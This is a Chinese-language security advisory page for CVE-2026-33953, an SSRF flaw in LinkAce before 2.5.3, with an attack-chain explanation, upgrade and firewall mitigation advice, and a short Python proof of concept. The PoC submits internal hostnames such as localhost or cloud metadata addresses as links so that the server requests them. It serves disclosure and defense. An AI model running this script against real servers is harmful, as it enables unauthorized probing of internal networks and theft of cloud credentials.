CVE-2026-33953 CVSS 8.5 高危

CVE-2026-33953 LinkAce 服务端请求伪造漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-33953

漏洞类型

服务端请求伪造 (SSRF)

CVSS评分

8.5 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

LinkAce

漏洞概述

LinkAce是一个自托管的网站链接归档系统。在2.5.3版本之前，该应用虽然阻止了对私有IP字面量的直接请求，但当内部资源通过内部主机名引用时，系统仍会执行对这些仅限内部资源的服务端请求。这一逻辑缺陷允许经过身份验证的用户触发服务器对内部服务的请求，进而访问LinkAce服务器可达但外部用户无法直接访问的资源。

技术细节

该漏洞属于典型的不完全过滤导致的服务端请求伪造（SSRF）。LinkAce的安全机制仅拦截了请求URL中明确包含私有IP地址字面量（如127.0.0.1或192.168.x.x）的请求，却忽略了对DNS重绑定或内部主机名的处理。攻击者利用低权限账户，可以构造包含内网主机名（如`localhost`、`intranet.corp`）的链接提交给系统。当LinkAce服务器处理该链接时，会解析主机名并向解析出的内网地址发起HTTP请求。由于请求源自受信任的服务器，防火墙通常会放行，从而允许攻击者探测内网端口、读取本地云元数据或攻击同网段的其他服务，导致机密性风险。

攻击链分析

STEP 1

1. 获取凭证

攻击者需要获取LinkAce应用程序的一个低权限账户凭据（PR:L），因为该漏洞需要身份验证。

STEP 2

2. 构造恶意Payload

攻击者构造一个包含内网主机名（如`localhost`、`internal-app`）的URL，而不是直接使用私有IP地址，以绕过IP字面量黑名单检查。

STEP 3

3. 提交请求

攻击者通过LinkAce的“添加链接”功能提交该恶意URL。

STEP 4

4. 服务端处理

LinkAce服务器接收请求，验证IP格式（通过），然后解析主机名，并向解析出的内网地址发起HTTP请求。

STEP 5

5. 信息泄露

内网服务响应请求，攻击者通过LinkAce返回的错误信息、响应时间或页面内容确认内网服务状态或获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# PoC for CVE-2026-33953 (LinkAce SSRF)
# This script demonstrates how an internal hostname can bypass IP literal checks.

import requests

def exploit_ssrf(target_url, internal_host):
    """
    Attempts to create a link pointing to an internal hostname.
    """
    session = requests.Session()
    # Authentication cookie or header is required (PR:L)
    session.headers.update({
        "Content-Type": "application/x-www-form-urlencoded",\n        "Cookie": "linkace_session=<authenticated_session_token>"
    })

    # Payload using internal hostname instead of IP
    payload = {
        "url": internal_host,  # e.g., http://localhost:8080 or http://metadata.google.internal
        "title": "Internal Resource",
        "list_id": "1",
        "tags": "test"
    }

    try:
        response = session.post(f"{target_url}/links", data=payload)
        if response.status_code == 200 or response.status_code == 201:
            print(f"[+] Request sent successfully. Server likely processed {internal_host}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "http://localhost:8000"  # Replace with actual LinkAce URL
    # Targeting an internal service reachable by the server
    internal_target = "http://localhost/admin" 
    exploit_ssrf(target, internal_target)

影响范围

LinkAce < 2.5.3

防御指南

临时缓解措施

建议立即将LinkAce升级到2.5.3版本以彻底修复此漏洞。如果无法立即升级，应在服务器防火墙或网络ACL中配置出站规则，禁止LinkAce应用服务器访问内网IP段（如127.0.0.0/8, 10.0.0.0/8等）及元数据服务地址。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表